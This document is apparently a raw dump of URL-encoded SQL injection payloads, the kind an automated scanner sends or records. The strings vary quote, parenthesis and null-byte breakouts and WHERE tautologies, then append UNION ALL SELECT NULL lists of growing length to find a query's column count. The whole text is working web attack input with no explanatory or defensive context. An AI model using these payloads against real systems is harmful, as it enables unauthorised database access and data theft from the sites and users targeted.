foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%202747%3D2747%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%207321%3D7321%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%204357%3D4357%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%201395%3D1395%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%205344%3D5344%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%208818%3D8818%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%202241%3D2241%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209032%3D9032%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%206708%3D6708%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%205655%3D5655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208750%3D8750%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%209878%3D9878%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%207197%3D7197%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208639%3D8639%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%205042%3D5042%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206162%3D6162%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206289%3D6289%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201252%3D1252%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201426%3D1426%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206159%3D6159%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%205731%3D5731%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201111%3D1111%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%209905%3D9905%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%203701%3D3701%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%205183%3D5183%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%202266%3D2266%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%203070%3D3070%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%202340%3D2340%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%207729%3D7729%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201131%3D1131%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201458%3D1458%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%207289%3D7289%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206244%3D6244%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%208438%3D8438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%202605%3D2605%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204603%3D4603%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%208318%3D8318%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%205689%3D5689%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201541%3D1541%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%201418%3D1418%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203078%3D3078%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202666%3D2666%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205905%3D5905%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207073%3D7073%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%209032%3D9032%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203535%3D3535%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%208153%3D8153%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%205301%3D5301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207391%3D7391%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207509%3D7509%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207447%3D7447%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203276%3D3276%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%206120%3D6120%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 